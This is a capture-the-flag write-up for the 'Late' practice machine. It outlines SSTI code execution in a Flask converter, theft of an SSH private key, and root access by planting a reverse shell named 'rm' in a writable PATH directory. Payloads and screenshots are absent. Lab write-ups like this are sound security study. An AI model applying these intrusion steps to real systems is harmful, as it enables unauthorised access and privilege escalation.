Late

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

late.htb

images.late.htb

Looks like the converter is susecptible to SSTI injection. The page said it is made with Flask.

Put some test code in a LibreOffice and screenshotted the code:

Results:

Changed code

Results:

Initial Foothold

Achieved remote code execution:

In librewriter (ctr-shft-j to go full screen):

Downloaded Reesult:

Found a SSH Private key in user svc_acc .ssh folder with the public key. Copied the id_rsa.pub to authorized_keys as well as copied the private key and ssh in as svc_acct.

User.txt Proof Screenshot

Privilege Escalation

Linpeas shows a file in /usr/local/sbin that is writable by svc_acct. The directory is also writabel by svc_acct

Contents of ssh-alert.sh:

#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

Script sends an email to root when an ssh session is started.
Running pspy to verify
Seems it removes the script and copies another one in it’s place.

The script is not using the whole path.
/usr/local/sbin is above /usr/bin which is where rm is located.


Created a reverse shell called rm and place it in the /usr/local/bin/ directory

RootScreenshot Here: